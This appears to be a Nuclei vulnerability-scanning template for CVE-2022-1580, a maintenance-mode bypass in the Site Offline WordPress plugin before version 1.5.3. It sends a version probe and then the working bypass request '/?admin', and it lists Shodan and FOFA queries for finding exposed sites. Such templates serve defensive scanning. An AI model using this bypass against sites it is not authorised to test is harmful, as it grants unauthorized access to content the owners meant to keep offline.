id: CVE-2022-1580 info: name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass author: s4e-io severity: medium description: | The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. impact: | Attackers can bypass the site offline/maintenance mode by adding specific keywords to the URL query string, gaining unauthorized access to the website. remediation: Fixed in 1.5.3 reference: - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2022-1580 cwe-id: CWE-639 epss-score: 0.15122 epss-percentile: 0.94774 cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: freehtmldesigns product: "site_offline" framework: wordpress publicwww-query: "/wp-content/plugins/site-offline/" shodan-query: http.html:/wp-content/plugins/site-offline/ fofa-query: body=/wp-content/plugins/site-offline/ tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns,vuln flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt" matchers: - type: word internal: true words: - "Site Offline Or Coming Soon Or Maintenance Mode" extractors: - type: regex part: body group: 1 name: version regex: - 'Stable tag: ([0-9.]+)' internal: true - method: GET path: - "{{BaseURL}}/?admin" matchers: - type: dsl dsl: - 'contains_all(body, "wp-block", "author")' - "status_code == 200" - "compare_versions(version, '< 1.5.3')" condition: and # digest: 490a0046304402205c7995838d1fec6ec691ad3a790a1c9612bfb69048e1e9ac4d99b0f5c53a3ae202205f2f955ebfaf54f9e68749a230562d21c2c4a8579ea205b5db105cddbe1ab058:922c64590222798bb761d5b6d8e72950